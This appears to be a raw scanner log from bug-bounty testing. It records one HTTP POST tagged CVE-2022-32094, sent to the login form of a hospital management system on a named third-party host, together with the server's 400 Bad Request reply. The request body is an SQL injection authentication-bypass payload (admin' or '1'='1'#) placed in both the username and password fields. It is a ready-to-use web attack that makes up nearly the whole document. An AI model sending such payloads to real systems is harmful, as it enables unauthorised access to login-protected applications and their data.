[CVE-2022-32094] Dumped HTTP request for https://techsolutions.bitpanda.com/hms/doctor/


POST /hms/doctor/ HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Connection: close
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
[CVE-2022-32094] Dumped HTTP response https://techsolutions.bitpanda.com/hms/doctor/

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 11
Date: Tue, 05 Aug 2025 12:53:22 GMT
Via: 1.1 31467e378930bcac2417aea59659f7e6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RSGiczRSzbr1Z3NXE2eF2jpc1rs7sehVvYhFv3-PVh1uWxe9ThP8IQ==
X-Amz-Cf-Pop: IAD55-P8
X-Cache: LambdaGeneratedResponse from cloudfront

Bad Request
